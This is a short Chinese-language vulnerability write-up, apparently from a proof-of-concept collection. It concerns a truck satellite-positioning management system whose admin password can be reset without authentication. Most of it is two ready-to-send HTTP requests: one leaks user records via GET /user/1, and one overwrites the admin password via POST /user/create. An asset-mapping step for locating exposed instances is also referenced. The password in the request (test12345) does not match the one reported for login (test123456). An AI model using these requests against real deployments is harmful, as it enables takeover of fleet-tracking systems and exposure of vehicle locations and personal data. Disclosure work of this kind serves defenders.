卡车卫星定位系统存在密码重置漏洞

一、漏洞简介

卡车卫星定位系统是一种基于卫星通信和导航技术的系统,用于对卡车的位置进行精确测定。该系统主要由一组卫星、地面控制站和接收器组成。通过测量卫星信号的传播时间,可以确定接收器(即卡车上的定位设备)所在的位置。卡车卫星定位系统存在密码重置漏洞,攻击者可通过该漏洞重置管理员密码获取应用系统权限。

二、影响版本

三、资产测绘

1714194591684-b20fda2d-1290-42b3-ba42-1bb3e9b8eaec.png

四、漏洞复现

未授权获取用户信息

GET /user/1 HTTP/1.1
Host: 
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

1714195256538-1777c084-e8eb-4a42-80dd-369a3f818ad0.png

未授权重置用户密码

POST /user/create HTTP/1.1
Host: 
Content-Length: 216
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wcms5c={%22L%22:%22en-US%22%2C%22V%22:%226.0.0.0%22%2C%22HP%22:8090%2C%22FP%22:[12060%2C12061%2C12062%2C12063]%2C%22TP%22:17891%2C%22RP%22:3113}
Connection: close

account=admin&id=1&password=test12345&passwordRepeat=test12345&groupName=111&roleid=5&validend=&phone=&email=&chncount=36&flowType=1&oldFlowType=&flowVal=&flowAlarmVal=&oldFlowAlarmVal=&logContent=111&guid=222&token=

1714194616666-3310af30-e319-4b92-9a19-f891d4ab050c.png

使用admin/test123456成功登录系统

1714194646386-33e08fee-38dc-404f-8ac2-f2a187dd3eb6.png

更新: 2024-04-28 16:14:27
原文: https://www.yuque.com/xiaokp7/ocvun2/ftoyh91uh1l7p5yz